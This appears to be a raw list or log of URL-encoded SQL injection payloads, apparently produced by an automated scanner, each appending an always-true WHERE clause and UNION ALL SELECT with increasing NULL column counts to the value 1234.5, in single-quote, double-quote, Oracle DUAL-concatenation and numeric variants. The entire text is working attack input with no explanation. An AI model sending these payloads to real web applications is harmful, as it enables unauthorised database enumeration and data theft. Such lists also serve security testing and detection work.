1234.5%27%29%20WHERE%209178%3D9178%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%201812%3D1812%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204897%3D4897%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206317%3D6317%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204554%3D4554%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%208236%3D8236%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%204117%3D4117%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%208001%3D8001%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%201153%3D1153%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%202565%3D2565%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%202609%3D2609%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%209187%3D9187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208101%3D8101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207138%3D7138%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%202145%3D2145%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%203659%3D3659%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%203410%3D3410%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%204926%3D4926%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%205605%3D5605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207655%3D7655%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%201352%3D1352%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208095%3D8095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20%7C%7C%20%28SELECT%207625%20FROM%20DUAL%20WHERE%202768%3D2768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205758%20FROM%20DUAL%20WHERE%203908%3D3908%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206102%20FROM%20DUAL%20WHERE%203476%3D3476%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208982%20FROM%20DUAL%20WHERE%201560%3D1560%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201779%20FROM%20DUAL%20WHERE%201595%3D1595%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205755%20FROM%20DUAL%20WHERE%209249%3D9249%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205849%20FROM%20DUAL%20WHERE%202573%3D2573%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208052%20FROM%20DUAL%20WHERE%203371%3D3371%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206213%20FROM%20DUAL%20WHERE%201450%3D1450%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207146%20FROM%20DUAL%20WHERE%207114%3D7114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207824%20WHERE%209151%3D9151%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202533%20WHERE%203766%3D3766%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208436%20WHERE%207377%3D7377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201262%20WHERE%206126%3D6126%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206258%20WHERE%206338%3D6338%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201377%20WHERE%207796%3D7796%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204986%20WHERE%206822%3D6822%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205652%20WHERE%209248%3D9248%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202200%20WHERE%201889%3D1889%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206956%20WHERE%205303%3D5303%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205646%20FROM%20DUAL%20WHERE%202530%3D2530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206311%20FROM%20DUAL%20WHERE%208226%3D8226%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 